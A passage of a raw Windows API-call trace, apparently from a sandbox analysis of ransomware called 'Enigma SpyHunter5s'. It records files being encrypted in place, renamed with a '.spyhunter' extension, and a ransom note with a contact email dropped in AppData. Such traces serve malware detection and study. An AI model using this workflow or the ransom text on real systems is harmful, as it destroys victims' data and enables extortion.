(in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed70 | out: pbBuffer=0x270ed70) returned 1 [0149.978] GetProcessHeap () returned 0x2c0000 [0149.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed68*=0x30) returned 1 [0149.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.979] GetProcessHeap () returned 0x2c0000 [0149.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.979] GetProcessHeap () returned 0x2c0000 [0149.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ddc8 | out: hHeap=0x2c0000) returned 1 [0149.979] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed68 | out: pbBuffer=0x270ed68) returned 1 [0149.979] GetProcessHeap () returned 0x2c0000 [0149.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed60*=0x30) returned 1 [0149.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.979] GetProcessHeap () returned 0x2c0000 [0149.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0149.979] GetProcessHeap () returned 0x2c0000 [0149.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33df18 | out: hHeap=0x2c0000) returned 1 [0149.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0149.980] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0149.980] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec9b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x270ec9b*, lpNumberOfBytesWritten=0x270edc4*=0x127, lpOverlapped=0x0) returned 1 [0149.981] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0149.981] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270edc4*=0x2ac, lpOverlapped=0x0) returned 1 [0149.981] CloseHandle (hObject=0xa0) returned 1 [0149.981] GetProcessHeap () returned 0x2c0000 [0149.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ca38 | out: hHeap=0x2c0000) returned 1 [0149.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0149.982] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0149.982] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec97*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270edc0, lpOverlapped=0x0 | out: lpBuffer=0x270ec97*, lpNumberOfBytesWritten=0x270edc0*=0x127, lpOverlapped=0x0) returned 1 [0149.984] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0149.985] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270edc0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270edc0*=0x2ac, lpOverlapped=0x0) returned 1 [0149.985] CloseHandle (hObject=0xa0) returned 1 [0149.985] GetProcessHeap () returned 0x2c0000 [0149.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08a28 | out: hHeap=0x2c0000) returned 1 [0149.985] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed60 | out: pbBuffer=0x270ed60) returned 1 [0149.985] GetProcessHeap () returned 0x2c0000 [0149.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0149.985] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed58*=0x30) returned 1 [0149.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_0gIu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_0giu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0149.985] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_0gIu.flv") returned 59 [0149.985] StrStrW (lpFirst="_0gIu.flv", lpSrch=".txt") returned 0x0 [0149.985] GetProcessHeap () returned 0x2c0000 [0149.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0149.986] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ed1c*=0x2800, lpOverlapped=0x0) returned 1 [0150.040] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.040] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ed1c*=0x2800, lpOverlapped=0x0) returned 1 [0150.040] GetProcessHeap () returned 0x2c0000 [0150.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.040] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.040] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed1c, lpOverlapped=0x0 | out: lpBuffer=0x270ed5c*, lpNumberOfBytesWritten=0x270ed1c*=0x4, lpOverlapped=0x0) returned 1 [0150.040] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed1c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed1c*=0x30, lpOverlapped=0x0) returned 1 [0150.041] CloseHandle (hObject=0xa0) returned 1 [0150.041] GetProcessHeap () returned 0x2c0000 [0150.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.041] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_0gIu.flv.spyhunter") returned 69 [0150.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_0gIu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_0giu.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_0gIu.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_0giu.flv.spyhunter")) returned 1 [0150.304] GetProcessHeap () returned 0x2c0000 [0150.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.304] GetProcessHeap () returned 0x2c0000 [0150.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.304] GetProcessHeap () returned 0x2c0000 [0150.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d038 | out: hHeap=0x2c0000) returned 1 [0150.304] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed58 | out: pbBuffer=0x270ed58) returned 1 [0150.304] GetProcessHeap () returned 0x2c0000 [0150.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.304] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed50*=0x30) returned 1 [0150.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rIkpQWxKoy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rikpqwxkoy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rIkpQWxKoy.png") returned 64 [0150.305] StrStrW (lpFirst="rIkpQWxKoy.png", lpSrch=".txt") returned 0x0 [0150.305] GetProcessHeap () returned 0x2c0000 [0150.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.305] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.306] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.306] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.306] GetProcessHeap () returned 0x2c0000 [0150.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.306] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.306] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x270ed54*, lpNumberOfBytesWritten=0x270ed14*=0x4, lpOverlapped=0x0) returned 1 [0150.307] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed14*=0x30, lpOverlapped=0x0) returned 1 [0150.307] CloseHandle (hObject=0xa0) returned 1 [0150.307] GetProcessHeap () returned 0x2c0000 [0150.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.307] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rIkpQWxKoy.png.spyhunter") returned 74 [0150.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rIkpQWxKoy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rikpqwxkoy.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\rIkpQWxKoy.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rikpqwxkoy.png.spyhunter")) returned 1 [0150.308] GetProcessHeap () returned 0x2c0000 [0150.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.308] GetProcessHeap () returned 0x2c0000 [0150.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.308] GetProcessHeap () returned 0x2c0000 [0150.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e087b8 | out: hHeap=0x2c0000) returned 1 [0150.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed58 | out: pbBuffer=0x270ed58) returned 1 [0150.308] GetProcessHeap () returned 0x2c0000 [0150.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.309] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed50*=0x30) returned 1 [0150.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\p020s5Vj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\p020s5vj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\p020s5Vj.m4a") returned 62 [0150.309] StrStrW (lpFirst="p020s5Vj.m4a", lpSrch=".txt") returned 0x0 [0150.309] GetProcessHeap () returned 0x2c0000 [0150.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.309] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.310] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.310] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed14*=0x2800, lpOverlapped=0x0) returned 1 [0150.310] GetProcessHeap () returned 0x2c0000 [0150.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.310] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.311] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x270ed54*, lpNumberOfBytesWritten=0x270ed14*=0x4, lpOverlapped=0x0) returned 1 [0150.311] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed14, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed14*=0x30, lpOverlapped=0x0) returned 1 [0150.311] CloseHandle (hObject=0xa0) returned 1 [0150.311] GetProcessHeap () returned 0x2c0000 [0150.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.311] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\p020s5Vj.m4a.spyhunter") returned 72 [0150.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\p020s5Vj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\p020s5vj.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\p020s5Vj.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\p020s5vj.m4a.spyhunter")) returned 1 [0150.312] GetProcessHeap () returned 0x2c0000 [0150.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.312] GetProcessHeap () returned 0x2c0000 [0150.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.312] GetProcessHeap () returned 0x2c0000 [0150.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c857a8 | out: hHeap=0x2c0000) returned 1 [0150.312] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed50 | out: pbBuffer=0x270ed50) returned 1 [0150.312] GetProcessHeap () returned 0x2c0000 [0150.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed48*=0x30) returned 1 [0150.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\njpOJ1zUMkecUSxQUmR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\njpoj1zumkecusxqumr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.313] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\njpOJ1zUMkecUSxQUmR.m4a") returned 73 [0150.313] StrStrW (lpFirst="njpOJ1zUMkecUSxQUmR.m4a", lpSrch=".txt") returned 0x0 [0150.313] GetProcessHeap () returned 0x2c0000 [0150.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.313] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0150.314] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.314] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0150.314] GetProcessHeap () returned 0x2c0000 [0150.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.315] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.315] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x270ed4c*, lpNumberOfBytesWritten=0x270ed0c*=0x4, lpOverlapped=0x0) returned 1 [0150.315] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed0c*=0x30, lpOverlapped=0x0) returned 1 [0150.315] CloseHandle (hObject=0xa0) returned 1 [0150.315] GetProcessHeap () returned 0x2c0000 [0150.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.315] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\njpOJ1zUMkecUSxQUmR.m4a.spyhunter") returned 83 [0150.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\njpOJ1zUMkecUSxQUmR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\njpoj1zumkecusxqumr.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\njpOJ1zUMkecUSxQUmR.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\njpoj1zumkecusxqumr.m4a.spyhunter")) returned 1 [0150.316] GetProcessHeap () returned 0x2c0000 [0150.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.316] GetProcessHeap () returned 0x2c0000 [0150.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.316] GetProcessHeap () returned 0x2c0000 [0150.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb51f8 | out: hHeap=0x2c0000) returned 1 [0150.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed50 | out: pbBuffer=0x270ed50) returned 1 [0150.316] GetProcessHeap () returned 0x2c0000 [0150.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.317] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed48*=0x30) returned 1 [0150.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MV7f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mv7f.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.317] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MV7f.wav") returned 58 [0150.317] StrStrW (lpFirst="MV7f.wav", lpSrch=".txt") returned 0x0 [0150.317] GetProcessHeap () returned 0x2c0000 [0150.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.317] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed0c*=0x2800, lpOverlapped=0x0) returned 1 [0150.318] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.318] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, 